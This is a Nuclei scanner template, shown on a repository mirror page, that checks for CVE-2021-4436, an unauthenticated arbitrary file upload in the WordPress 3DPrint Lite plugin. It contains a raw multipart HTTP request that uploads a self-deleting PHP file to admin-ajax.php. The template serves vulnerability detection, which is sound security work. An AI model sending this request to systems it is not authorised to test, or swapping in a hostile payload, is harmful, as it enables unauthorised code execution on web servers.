daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2021/CVE-2021-4436.yaml

66 lines
2.4 KiB
YAML
Raw Blame History

id: CVE-2021-4436
info:
name: 3DPrint Lite < 1.9.1.5 - Arbitrary File Upload
author: securityforeveryone
severity: critical
description: |
The plugin does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.
remediation: Fixed in 1.9.1.5
reference:
- https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282/
- https://nvd.nist.gov/vuln/detail/CVE-2021-4436
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-4436
cwe-id: CWE-434
epss-score: 0.00412
epss-percentile: 0.73863
cpe: cpe:2.3:a:wp3dprinting:3dprint_lite:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: wp3dprinting
product: 3dprint_lite
framework: wordpress
publicwww-query: "/wp-content/plugins/3dprint-lite/"
tags: cve,cve2021,3dprint-lite,file-upload,instrusive,wpscan,wordpress,wp-plugin,intrusive
variables:
string: "{{randstr}}"
filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353
-----------------------------54331109111293931601238262353
Content-Disposition: form-data; name="action"
p3dlite_handle_upload
-----------------------------54331109111293931601238262353
Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
Content-Type: text/php
<?php echo "{{string}}";unlink(__FILE__);?>
-----------------------------54331109111293931601238262353--
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"jsonrpc":"2.0"'
- '"filename":'
- '{{filename}}.php'
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220505cc213149b2b7ea3611ef5cd0bf0c1d786d34503427cfdbd6ccc0844710e430221008083729a34767882c976fc061ae7a9a6db2061f3de0036ea1c4da8ec263724cf:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink